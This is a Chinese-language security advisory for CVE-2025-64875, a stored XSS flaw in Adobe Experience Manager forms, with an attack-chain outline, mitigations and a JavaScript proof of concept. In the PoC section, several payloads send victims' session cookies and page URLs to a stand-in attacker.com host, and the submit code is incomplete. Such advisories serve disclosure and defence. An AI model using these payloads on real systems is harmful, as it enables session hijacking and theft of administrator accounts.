CVE-2025-64875 Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64875

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64875是Adobe Experience Manager（AEM）中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响AEM 6.5.23及更早版本。攻击者可以利用此漏洞通过低权限账户在表单字段中注入恶意JavaScript代码。一旦恶意脚本被存储到服务器端，当其他用户（尤其是管理员）浏览包含该漏洞字段的页面时，存储的恶意脚本会在其浏览器中执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击传播或对网站内容进行篡改等严重后果。由于该漏洞属于存储型XSS，恶意脚本会持久存在于系统中，只要用户访问受影响的页面就会触发攻击，因此危害性较大。攻击者无需高权限即可实施攻击，只需能够访问并提交表单数据即可。

技术细节

该存储型XSS漏洞存在于Adobe Experience Manager的表单处理模块中。漏洞的根本原因在于应用程序未能对用户提交的表单输入进行充分的输入验证和输出编码。当低权限用户在表单字段中输入包含恶意JavaScript代码的内容时（如：<script>alert(document.cookie)</script>），系统直接将输入存储到数据库中而未进行安全过滤。随后，当其他用户访问包含该表单字段的页面时，服务器从数据库中检索并输出该数据，恶意脚本随之被嵌入到返回的HTML页面中并在用户浏览器执行。攻击者可以利用此漏洞窃取受害者的会话cookie、进行键盘记录、修改页面内容或重定向用户到恶意网站。由于AEM通常用于企业级内容管理，管理员经常登录后台进行内容管理操作，因此攻击者特别针对管理员账户以获取更高权限或访问敏感数据。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标AEM实例并确认版本号低于6.5.24

STEP 2

Access Gaining

攻击者获取AEM的低权限账户访问权限（如内容作者或普通用户）

STEP 3

Payload Injection

攻击者在可访问的表单字段中注入恶意JavaScript代码，如<script>标签或事件处理器属性

STEP 4

Data Persistence

恶意脚本被存储到AEM数据库中，由于是存储型XSS，payload持久存在

STEP 5

Victim Trigger

当管理员或其他用户访问包含注入payload的页面时，恶意脚本在其浏览器中执行

STEP 6

Impact Execution

攻击者通过执行的JavaScript窃取会话cookie、劫持账户或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64875 PoC - Adobe Experience Manager Stored XSS
// Target: Adobe Experience Manager < 6.5.24
// Attack Vector: Inject malicious JavaScript into form fields

// Step 1: Login to AEM with low-privileged account
const loginEndpoint = 'http://target-aem.com/libs/granite/core/content/login.html';
const credentials = {
    username: 'attacker',
    password: 'attacker_password'
};

// Step 2: Submit form with XSS payload
const formPayload = {
    './jcr:title': '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>',
    './text': '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">',
    './description': '<svg/onload=fetch("https://attacker.com/exfil?data="+document.location.href)'
};

// Step 3: When victim (admin) views the page containing the injected field,
// the malicious script will execute in their browser
// This allows attacker to steal session cookies, perform actions as admin, etc.

fetch('http://target-aem.com/content/forms/af/vulnerable-form/jcr:content/guideContainer.af.submit.jsp', {
    method: 'POST',
    body: JSON.stringify(formPayload),
    headers: {
        'Content-Type': 'application/json',
        'Cookie': 'login-token=' + sessionToken
    }
});

console.log('XSS payload submitted successfully');

影响范围

Adobe Experience Manager 6.5.23 及更早版本

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）禁用或限制低权限用户创建和编辑表单的能力；2）实施严格的输入过滤规则，阻止<script>、<img>、<svg>等可能用于XSS的标签；3）配置WAF（Web应用防火墙）规则检测和阻止XSS攻击向量；4）对所有输出内容实施HTML编码；5）限制表单内容的渲染上下文，使用text而非html类型；6）启用AEM的安全检查清单并遵循最佳安全实践。